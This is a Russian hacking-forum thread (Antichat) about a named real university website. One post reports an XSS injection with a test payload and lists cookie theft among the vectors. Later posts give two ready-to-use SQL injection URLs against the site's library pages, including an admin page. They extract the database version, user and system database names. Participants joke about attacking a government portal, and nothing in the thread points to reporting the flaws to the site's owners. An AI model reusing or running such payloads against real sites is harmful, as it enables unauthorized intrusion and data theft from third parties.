Форум АНТИЧАТ - xss уязвимость

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - xss уязвимость (https://forum.antichat.xyz/showthread.php?t=449967)

qwebdev

01.04.2017 10:33

Нашел на сайте http://abc.vvsu.ru/ xss-уязвимость,

при вводе

">alert('xss')"

SooLFaa

01.04.2017 13:25

Я бы помог. Но мало того, что это .ru, это еще и гос сайт. с ' очевидно что скуля. А с хсской куча векторов но все они клиентские. От угона куков до хека тачки

leksadin

05.04.2017 00:39

[QUOTE="qwebdev"]
qwebdev said:
↑
Нашел на сайте
http://abc.vvsu.ru/
xss-уязвимость,
при вводе
">alert('xss')"alert('xss')"

Gorev

05.04.2017 08:48

Код:

Code:

http://lib.vvsu.ru/russian/index.php?id=61&id_exhibition=156+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6+--+

но это уже совсем другая история

Код:

Code:

http://lib.vvsu.ru//admin/news.asp?idyear=999999.9+union+all+select+null,null,null,(select+char(126)%2bchar(39)%2bname%2bchar(39)%2bchar(126)+from+master..sysdatabases+where+dbid=1),null,null,null,null--

а вот это твоя история

SooLFaa

05.04.2017 16:20

Цитата:

Сообщение от Gorev

Gorev said:
↑

Код:

Code:

http://lib.vvsu.ru/russian/index.php?id=61&id_exhibition=156+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6+--+

но это уже совсем другая история

Код:

Code:

http://lib.vvsu.ru//admin/news.asp?idyear=999999.9+union+all+select+null,null,null,(select+char(126)%2bchar(39)%2bname%2bchar(39)%2bchar(126)+from+master..sysdatabases+where+dbid=1),null,null,null,null--

а вот это твоя история

Да ВЫ бессмерты, Сударь. Хекать так спокойно гос портал, да ещё и рушный.

Gorev

05.04.2017 16:35

Цитата:

Сообщение от SooLFaa

SooLFaa said:
↑
Да ВЫ бессмерты, Сударь. Хекать так спокойно гос портал, да ещё и рушный.

Отнюдь, милорд, я лишь указал направление, вектор так сказать...

Время: 23:37